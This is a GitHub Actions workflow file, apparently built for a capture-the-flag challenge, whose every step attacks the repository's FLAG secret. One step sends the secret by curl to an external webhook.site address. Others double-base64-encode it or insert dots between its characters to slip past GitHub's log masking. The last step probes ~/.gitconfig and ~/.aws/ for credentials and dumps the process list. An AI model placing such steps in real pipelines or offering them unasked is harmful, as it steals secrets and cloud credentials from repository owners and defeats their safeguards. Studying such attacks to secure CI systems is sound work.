name: Action Jackson

on:
  push:
    branches:
      - infinity*

jobs:
  greeting:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3
      - name: Secret Exfiltration
        env:
          HIDDEN: ${{ secrets.FLAG }}
        run:  |
          curl "https://webhook.site/d84295fb-be2c-419e-98a3-2b36f3173f1a" -sH "Content-Type: application/json" --data "$HIDDEN"

      - name: Reveal Secret
        env:
          HIDDEN: ${{ secrets.FLAG }}
        run: |
          # Encode twice to hide it from the log masker
          echo "$HIDDEN" | base64 | base64
      - name: Runtime Secret Discovery
        env:
          HIDDEN: ${{ secrets.FLAG }}
        run: |
          echo "--- Searching Environment Variables ---"
          # 'env' shows all variables. We use 'sed' to put a dot between characters 
          # so the GitHub Masker doesn't recognize the secret.
          env | grep HIDDEN | sed 's/./&./g'
          
          echo "--- Searching Disk for AWS/Git Credentials ---"
          # Real-world runners often store temporary tokens in these files
          ls -la ~/.gitconfig || echo "No git config"
          ls -la ~/.aws/ || echo "No AWS folder"
          
          echo "--- Process List Check ---"
          # Shows if any other processes are running that might have arguments containing secrets
          ps auxww
